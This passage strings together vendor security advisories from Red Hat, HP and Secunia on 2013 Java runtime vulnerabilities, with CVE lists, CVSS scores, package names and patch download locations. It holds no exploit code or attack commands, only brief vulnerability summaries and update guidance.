CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0444, CVE-2013-0445,
CVE-2013-0446, CVE-2013-0449, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473,
CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485,
CVE-2013-1486, CVE-2013-1487, CVE-2013-1493)
All users of java-1.7.0-ibm are advised to upgrade to these updated
packages, containing the IBM Java SE 7 SR4 release. All running instances
of IBM Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
894172 - CVE-2013-0422 OpenJDK: MethodHandles.Lookup incorrect permission checks, Java 7 0day (Libraries, 8006017)
894934 - CVE-2012-3174 OpenJDK: MethodHandles incorrect permission checks (Libraries, 8004933)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446)
913021 - CVE-2013-1484 OpenJDK: MethodHandleProxies insufficient privilege checks (Libraries, 8004937)
913025 - CVE-2013-1485 OpenJDK: MethodHandles insufficient privilege checks (Libraries, 8006439)
913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment)
917550 - CVE-2013-0809 OpenJDK: Specially crafted sample model integer overflow (2D, 8007014)
917553 - CVE-2013-1493 OpenJDK: CMM malformed raster memory corruption (2D, 8007675)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
ppc:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
ppc64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3174.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0422.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-0809.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1484.html
https://www.redhat.com/security/data/cve/CVE-2013-1485.html
https://www.redhat.com/security/data/cve/CVE-2013-1486.html
https://www.redhat.com/security/data/cve/CVE-2013-1487.html
https://www.redhat.com/security/data/cve/CVE-2013-1493.html
https://access.redhat.com/security/updates/classification/#critical
https://www.ibm.com/developerworks/java/jdk/alerts/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRPja8XlSAg2UNWIIRAheUAJ0YfD3Wq1TJTNvd9g6aoCaIIOMstgCfRXuh
Y+iAc4f3P9/We3tINcGRMdo=
=Yacn
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Release Date: 2013-10-30
Last Updated: 2013-12-11
Potential Security Impact: Java Runtime Environment (JRE) security update
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Service
Manager and ServiceCenter for Windows, Linux, HP-UX, Solaris and AIX.
HP Service Manager Web Tier v7.11, v9.30, v9.31
HP ServiceCenter Web Tier v6.2.8
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-1543 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-4301 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-4305 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0430 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0436 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0439 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0447 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0448 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1474 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1477 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1479 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1482 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1483 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available that updates the JRE to
the latest version to resolve the known JRE7-related security
vulnerabilities.
The updates can be downloaded from HP Software Support Online (SSO).
HP Product/Version
Platform/Component
Location
HP Service Manager 9.31.2004 p2
AIX Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_0041
HP Service Manager 9.31.2004 p2
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00420
HP Service Manager 9.31.2004 p2
Linux Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00421
HP Service Manager 9.31.2004 p2
Solaris Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00422
HP Service Manager 9.31.2004 p2
Web Tier
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00424
HP Service Manager 9.31.2004 p2
Windows Client
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00425
HP Service Manager 9.31.2004 p2
KnowledgeManagement
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00426
HP Service Manager 7.11.655 p21
AIX Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00482
HP Service Manager 7.11.655 p21
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00483
HP Service Manager 7.11.655 p21
HP parisc Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00484
HP Service Manager 7.11.655 p21
Linux x86 Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00485
HP Service Manager 7.11.655 p21
Solaris Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00486
HP Service Manager 7.11.655 p21
Windows Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00487
HP Service Manager 7.11.655 p21
Web Tier
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00488
HP Service Manager 7.11.655 p21
Windows Client
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00489
HP ServiceCenter 6.2.8.14
AIX Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00279
HP ServiceCenter 6.2.8.14
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00280
HP ServiceCenter 6.2.8.14
HP parisc Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00281
HP ServiceCenter 6.2.8.14
Linux Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00282
HP ServiceCenter 6.2.8.14
Solaris Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00283
HP ServiceCenter 6.2.8.14
Windows Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00284
HP ServiceCenter 6.2.8.14
Web Tier
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00285
HP ServiceCenter 6.2.8.14
Windows Client
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00286
HISTORY
Version:1 (rev.1) - 29 April 2013 Initial release
Version:2 (rev.2) - 30 October 2013 added HP Service Manager v7.11
Version:3 (rev.3) - 11 December 2013 added HP ServiceCenter v6.2.8
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
